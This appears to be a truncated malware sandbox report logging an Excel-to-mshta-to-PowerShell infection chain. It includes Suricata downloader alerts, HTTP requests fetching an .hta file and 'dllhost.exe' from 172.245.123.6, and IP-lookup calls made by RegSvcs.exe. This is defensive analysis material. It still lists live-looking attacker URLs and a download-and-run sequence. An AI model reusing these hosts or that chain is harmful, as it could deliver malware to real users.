            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49175 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49200 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49190 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49188 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.6If-Range: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET /770/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMTConnection: Keep-AliveHost: 172.245.123.6If-None-Match: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A7018 URLDownloadToFileW,7_2_000007FE899A7018
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 172.245.123.6 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Range: bytes=8896- | Connection: Keep-Alive | Host: 172.245.123.6 | If-Range: "1ceb0-6234c398c9718"
            Source: global traffic | HTTP traffic detected: GET /770/dllhost.exe HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 172.245.123.6 | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1 | Accept: */* | Accept-Language: en-US | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMT | Connection: Keep-Alive | Host: 172.245.123.6 | If-None-Match: "1ceb0-6234c398c9718"
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global traffic | DNS traffic detected: DNS query: og1.in
            Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
            Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
            Source: mshta.exe, 0000000C.00000003.470945172.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.0000000003804000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.0000000003804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/
            Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost
            Source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exe
            Source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exep
            Source: powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exes
            Source: powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/770/dllhost.exes?e
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/C
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/O
            Source: mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472468543.000000000374A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471050000.000000000374A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
            Source: mshta.exe, 0000000C.00000003.467118716.0000000000142000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472118068.0000000000131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...
            Source: mshta.exe, 00000004.00000003.420063943.000000000305C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420394140.000000000305C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8
            Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7
            Source: mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8A
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaA
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaW
            Source: mshta.exe, 0000000C.00000003.468426129.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.000000000375C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.000000000375C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaet
            Source: mshta.exe, 00000004.00000003.417386530.00000000027A5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.467894962.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470616202.0000000002B45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo
            Source: mshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472075496.00000000000FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htas
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026A7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 
00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: RegSvcs.exe, 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.632431722.00000000053CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.000000000071B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: RegSvcs.exe, 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: mshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449516187.000000001A62F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000787000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.632454765.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
